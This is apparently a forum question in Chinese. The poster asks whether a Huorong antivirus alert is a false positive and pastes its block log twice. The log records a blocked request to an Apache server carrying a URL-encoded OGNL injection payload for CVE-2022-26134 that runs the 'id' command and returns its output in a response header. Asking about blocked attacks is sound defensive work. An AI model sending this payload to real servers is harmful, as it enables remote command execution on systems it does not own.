刚刚火绒弹窗提示我受到网络攻击,请问大佬这个是误判吗,这个是具体的拦截日志:
【1】2025-04-03 14:42:24,网络防护,Web服务保护,受到10.160.12.63的网络攻击,已阻止
攻击方式:Exploit/CVE-2022-26134
访问地址:10.160.12.15:8888/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
远程地址:10.160.12.63:36386
本地地址:10.160.12.15:8888
防御结果:已阻止
进程ID:7496
操作进程:C:\Apache24\bin\httpd.exe
操作进程命令行:"C:\Apache24\bin\httpd.exe" -k runservice
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【1】2025-04-03 14:42:24,网络防护,Web服务保护,受到10.160.12.63的网络攻击,已阻止
攻击方式:Exploit/CVE-2022-26134
访问地址:10.160.12.15:8888/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
远程地址:10.160.12.63:36386
本地地址:10.160.12.15:8888
防御结果:已阻止
进程ID:7496
操作进程:C:\Apache24\bin\httpd.exe
操作进程命令行:"C:\Apache24\bin\httpd.exe" -k runservice
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
